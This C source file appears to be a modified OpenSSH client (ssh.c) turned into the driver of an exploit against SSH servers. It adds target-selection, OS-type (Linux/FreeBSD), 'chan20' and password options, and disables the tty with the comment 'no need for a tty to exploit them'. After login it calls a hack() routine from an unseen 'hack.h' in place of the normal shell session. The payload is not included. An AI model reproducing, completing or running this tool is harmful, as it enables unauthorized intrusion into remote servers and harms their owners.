#include "includes.h"
#include <openssl/evp.h>
#include <openssl/err.h>

#include "ssh.h"
#include "ssh2.h"
#include "compat.h"
#include "cipher.h"
#include "xmalloc.h"
#include "packet.h"
#include "buffer.h"
#include "uidswap.h"
#include "channels.h"
#include "key.h"
#include "authfd.h"
#include "authfile.h"
#include "pathnames.h"
#include "clientloop.h"
#include "log.h"
#include "readconf.h"
#include "sshconnect.h"
#include "tildexpand.h"
#include "dispatch.h"
#include "misc.h"
#include "kex.h"
#include "mac.h"
#include "sshtty.h"
#include "canohost.h"
#include "hack.h"
#ifdef HAVE___PROGNAME
extern char *__progname;
#else
char *__progname;
#endif

/* Flag indicating whether IPv4 or IPv6.  This can be set on the command line.
   Default value is AF_UNSPEC means both IPv4 and IPv6. */
#ifdef IPV4_DEFAULT
int IPv4or6 = AF_INET;
#else
int IPv4or6 = AF_UNSPEC;
#endif

/* Flag indicating whether debug mode is on.  This can be set on the command line. */
int debug_flag = 0;

/* Flag indicating whether a tty should be allocated */
int tty_flag = 0;
int no_tty_flag = 0;
int force_tty_flag = 0;

/* don't exec a shell */
int no_shell_flag = 0;
/* default target */
int target = -1;

/*
 * Flag indicating that nothing should be read from stdin.  This can be set
 * on the command line.
 */
int stdin_null_flag = 0;

/*
 * Flag indicating that ssh should fork after authentication.  This is useful
 * so that the pasphrase can be entered manually, and then ssh goes to the
 * background.
 */
int fork_after_authentication_flag = 0;

/*
 * General data structure for command line options and options configurable
 * in configuration files.  See readconf.h.
 */
Options options;

/*
 * Name of the host we are connecting to.  This is the name given on the
 * command line, or the HostName specified for the user-supplied name in a
 * configuration file.
 */
char *host;
char *globpass;
unsigned int chan20 = 0;
int os = -1;
/* socket address the host resolves to */
struct sockaddr_storage hostaddr;

/*
 * Flag to indicate that we have received a window change signal which has
 * not yet been processed.  This will cause a message indicating the new
 * window size to be sent to the server a little later.  This is volatile
 * because this is updated in a signal handler.
 */
volatile int received_window_change_signal = 0;

/* Private host keys. */
struct {
	Key     **keys;
	int	nkeys;
} sensitive_data;

/* Original real UID. */
uid_t original_real_uid;

/* command to be executed */
Buffer command;

/* Should we execute a command or invoke a subsystem? */
int subsystem_flag = 0;
/* Prints a help message to the user.  This function never returns. */
int	ssh_session2(void);
void	load_public_identity_files(void);
/*
 * Main program for the ssh client.
 */
int
main(int ac, char **av)
{
	int i, opt, optind, ok,havetarget=0; 
	char *optarg, *cp, buf[256];
	struct stat st;
	struct passwd *pw;
	uid_t original_effective_uid=getuid();

	__progname = get_progname(av[0]);
	init_rng();

	pw = getpwuid(original_real_uid);
	if (!pw) {
		log("You don't exist, go away!");
		exit(1);
	}
	pw = pwcopy(pw);


	/* Initialize option structure to indicate that no values have been set. */
	initialize_options(&options);

	/* Parse command-line arguments. */
	host = NULL;
	options.protocol = SSH_PROTO_2;
	for (optind = 1; optind < ac; optind++) {
		if (av[optind][0] != '-') {
			if (host)
				break;
			if ((cp = strchr(av[optind], '@'))) {
				if(cp == av[optind])
					usage();
				options.user = av[optind];
				*cp = '\0';
				host = ++cp;
			} else
				host = av[optind];
			continue;
		}
		opt = av[optind][1];
		if (!opt)
			usage();
		if (strchr("ilcptoP", opt)) {   /* options with arguments */
			optarg = av[optind] + 2;
			if (strcmp(optarg, "") == 0) {
				if (optind >= ac - 1)
					usage();
				optarg = av[++optind];
			}
		} else {
			if (av[optind][2])
				usage();
			optarg = NULL;
		}
		switch (opt) {
		case 't':
			havetarget = 1;
			target = atoi(optarg);
			break;
		case 'i':
			if (stat(optarg, &st) < 0) {
				fprintf(stderr, "Warning: Identity file %s does not exist.\n",
				    optarg);
				break;
			}
			if (options.num_identity_files >= SSH_MAX_IDENTITY_FILES)
				fatal("Too many identity files specified (max %d)",
				    SSH_MAX_IDENTITY_FILES);
			options.identity_files[options.num_identity_files++] = xstrdup(optarg);
			break;
		case 'v':
			if (0 == debug_flag) {
				debug_flag = 1;
				options.log_level = SYSLOG_LEVEL_DEBUG1;
			} else if (options.log_level < SYSLOG_LEVEL_DEBUG3) {
				options.log_level++;
				break;
			} else {
				fatal("Too high debugging level.");
			}
			/* fallthrough */
		case 'c':
			chan20 = strtoul(optarg, NULL, 0);
			break;
		case 'p':
			options.port = a2port(optarg);
			if (options.port == 0) {
				fprintf(stderr, "Bad port '%s'\n", optarg);
				exit(1);
			}
			break;
		case 'l':
			options.user = optarg;
			break;
		case 'o':
			if(!strcmp(optarg, "l"))
				os = LINUX;
			else if (!strcmp(optarg, "f"))
				os = FREEBSD;
			else {
				fprintf(stderr, "Bad OS type\n\n");
				usage();
			}
			break;
		case 'P':
			globpass = optarg;
			break;
		default:
			usage();
		}
	}

	/* Check that we got a host name. */
	if (!host || (!havetarget && !chan20))
		usage();
	if(chan20 && os == -1) 
		usage();

	SSLeay_add_all_algorithms();
	ERR_load_crypto_strings();

	/* Initialize the command to execute on remote host. */
	buffer_init(&command);

	/* no need for a tty to exploit them */	
	no_tty_flag = 1;
	tty_flag = 0;

	/*
	 * Initialize "log" output.  Since we are the client all output
	 * actually goes to stderr.
	 */
	log_init(av[0], options.log_level == -1 ? SYSLOG_LEVEL_INFO : options.log_level,
	    SYSLOG_FACILITY_USER, 1);

	fill_default_options(&options);

	/* reinit */
	log_init(av[0], options.log_level, SYSLOG_FACILITY_USER, 1);

	seed_rng();

	if (options.user == NULL)
		options.user = xstrdup(pw->pw_name);

	if (options.hostname != NULL)
		host = options.hostname;

	/* Open a connection to the remote host. */
	ok = ssh_connect(host, &hostaddr, options.port,
	    options.connection_attempts,
	    original_effective_uid != 0 || !options.use_privileged_port,
	    pw, options.proxy_command);

	/*
	 * If we successfully made the connection, load the host private key
	 * in case we will need it later for combined rsa-rhosts
	 * authentication. This must be done before releasing extra
	 * privileges, because the file is only readable by root.
	 */
	sensitive_data.nkeys = 0;
	sensitive_data.keys = NULL;
	if (ok && (options.rhosts_rsa_authentication ||
	   	options.hostbased_authentication)) {
		sensitive_data.nkeys = 3;
		sensitive_data.keys = xmalloc(sensitive_data.nkeys*sizeof(Key));
		sensitive_data.keys[0] = key_load_private_type(KEY_RSA1,
		    _PATH_HOST_KEY_FILE, "", NULL);
		sensitive_data.keys[1] = key_load_private_type(KEY_DSA,
		    _PATH_HOST_DSA_KEY_FILE, "", NULL);
		sensitive_data.keys[2] = key_load_private_type(KEY_RSA,
		    _PATH_HOST_RSA_KEY_FILE, "", NULL);
	}

	/*
	 * Now that we are back to our own permissions, create ~/.ssh
	 * directory if it doesn\'t already exist.
	 */
	snprintf(buf, sizeof buf, "%.100s/%.100s", pw->pw_dir, _PATH_SSH_USER_DIR);
	if (stat(buf, &st) < 0)
		if (mkdir(buf, 0700) < 0)
			error("Could not create directory '%.200s'.", buf);

	if (!ok) {
		printf("connection refused\n");
		exit(1);
	}
	/* load options.identity_files */
	load_public_identity_files();

	/* Expand ~ in known host file names. */
	/* XXX mem-leaks: */
	options.system_hostfile =
	    tilde_expand_filename(options.system_hostfile, original_real_uid);
	options.user_hostfile =
	    tilde_expand_filename(options.user_hostfile, original_real_uid);
	options.system_hostfile2 =
	    tilde_expand_filename(options.system_hostfile2, original_real_uid);
	options.user_hostfile2 =
	    tilde_expand_filename(options.user_hostfile2, original_real_uid);
	/* Log into the remote system.  This never returns if the login fails. */
	ssh_login(sensitive_data.keys, sensitive_data.nkeys,
	    host, (struct sockaddr *)&hostaddr, pw);	

	/* We no longer need the private host keys.  Clear them now. */
	if (sensitive_data.nkeys != 0) {
		for (i = 0; i < sensitive_data.nkeys; i++) {
			if (sensitive_data.keys[i] != NULL) {
				/* Destroys contents safely */
				debug3("clear hostkey %d", i);
				key_free(sensitive_data.keys[i]);
				sensitive_data.keys[i] = NULL;
			}
		}
		xfree(sensitive_data.keys);
	}
	ssh_session2();
	packet_close();
	return 0;
}

void
ssh_init_forwarding(void)
{
	int success = 0;
	int i;

	/* Initiate local TCP/IP port forwardings. */
	for (i = 0; i < options.num_local_forwards; i++) {
		debug("Connections to local port %d forwarded to remote address %.200s:%d",
		    options.local_forwards[i].port,
		    options.local_forwards[i].host,
		    options.local_forwards[i].host_port);
		success += channel_request_local_forwarding(
		    options.local_forwards[i].port,
		    options.local_forwards[i].host,
		    options.local_forwards[i].host_port,
		    options.gateway_ports);
	}
	if (i > 0 && success == 0)
		error("Could not request local forwarding.");

	/* Initiate remote TCP/IP port forwardings. */
	for (i = 0; i < options.num_remote_forwards; i++) {
		debug("Connections to remote port %d forwarded to local address %.200s:%d",
		    options.remote_forwards[i].port,
		    options.remote_forwards[i].host,
		    options.remote_forwards[i].host_port);
		channel_request_remote_forwarding(
		    options.remote_forwards[i].port,
		    options.remote_forwards[i].host,
		    options.remote_forwards[i].host_port);
	}
}

void
check_agent_present(void)
{
	if (options.forward_agent) {
		/* Clear agent forwarding if we don\'t have an agent. */
		int authfd = ssh_get_authentication_socket();
		if (authfd < 0)
			options.forward_agent = 0;
		else
			ssh_close_authentication_socket(authfd);
	}
}


void
client_subsystem_reply(int type, int plen, void *ctxt)
{
	int id, len;

	id = packet_get_int();
	len = buffer_len(&command);
	if (len > 900)
		len = 900;
	packet_done();
	if (type == SSH2_MSG_CHANNEL_FAILURE)
		fatal("Request for subsystem '%.*s' failed on channel %d",
		    len, buffer_ptr(&command), id);
}

void
ssh_session2_callback(int id, void *arg)
{
	int len;
	int interactive = 0;
	struct termios tio;
	debug("client_init id %d arg %ld", id, (long)arg);
	if (tty_flag) {
		struct winsize ws;
		char *cp;
		cp = getenv("TERM");
		if (!cp)
			cp = "";
		/* Store window size in the packet. */
		if (ioctl(fileno(stdin), TIOCGWINSZ, &ws) < 0)
			memset(&ws, 0, sizeof(ws));
			channel_request_start(id, "pty-req", 0);
			packet_put_cstring(cp); 
			packet_put_int(ws.ws_col);
			packet_put_int(ws.ws_row);
			packet_put_int(ws.ws_xpixel);
			packet_put_int(ws.ws_ypixel);
			tio = get_saved_tio();
			tty_make_modes(/*ignored*/ 0, &tio);
			packet_send();
			interactive = 1;
		/* XXX wait for reply */
	}

	check_agent_present();
	if (options.forward_agent) {
		debug("Requesting authentication agent forwarding.");
		channel_request_start(id, "auth-agent-req@openssh.com", 0);
		packet_send();
	}
	len = buffer_len(&command);
	if (len > 0) {
		if (len > 900)
			len = 900;
		if (subsystem_flag) {
			debug("Sending subsystem: %.*s", len, buffer_ptr(&command));
			channel_request_start(id, "subsystem", /*want reply*/ 1);
			/* register callback for reply */
			/* XXX we asume that client_loop has already been called */
			dispatch_set(SSH2_MSG_CHANNEL_FAILURE, &client_subsystem_reply);
			dispatch_set(SSH2_MSG_CHANNEL_SUCCESS, &client_subsystem_reply);
		} else {
			debug("Sending command: %.*s", len, buffer_ptr(&command));
			channel_request_start(id, "exec", 0);
		}
		packet_put_string(buffer_ptr(&command), buffer_len(&command));
		packet_send();
	} else {
		channel_request(id, "shell", 0);
	}
	/* channel_callback(id, SSH2_MSG_OPEN_CONFIGMATION, client_init, 0); */
	/* register different callback, etc. XXX */
	packet_set_interactive(interactive);
}

int
ssh_session2_command(void)
{
	int window, packetmax;
	int in, out, err;

	if (stdin_null_flag) {
		in = open(_PATH_DEVNULL, O_RDONLY);
	} else {
		in = dup(STDIN_FILENO);
	}
	out = dup(STDOUT_FILENO);
	err = dup(STDERR_FILENO);

	if (in < 0 || out < 0 || err < 0)
		fatal("dup() in/out/err failed");

	/* enable nonblocking unless tty */
	if (!isatty(in))
		set_nonblock(in);
	if (!isatty(out))
		set_nonblock(out);
	if (!isatty(err))
		set_nonblock(err);

	window = CHAN_SES_WINDOW_DEFAULT;
	packetmax = CHAN_SES_PACKET_DEFAULT;
	if (!tty_flag) {
		window *= 2;
		packetmax *=2;
	}
	hack();
	return 0;
}

int
ssh_session2(void)
{
	int id;

	/* XXX should be pre-session */
	ssh_init_forwarding();

	id = no_shell_flag ? -1 : ssh_session2_command();
	return 0;

}

void
load_public_identity_files(void)
{
	char *filename;
	Key *public;
	int i;

	for (i = 0; i < options.num_identity_files; i++) {
		filename = tilde_expand_filename(options.identity_files[i],
		    original_real_uid);
		public = key_load_public(filename, NULL);
		debug("identity file %s type %d", filename,
		    public ? public->type : -1);
		xfree(options.identity_files[i]);
		options.identity_files[i] = filename;
		options.identity_keys[i] = public;
	}
}
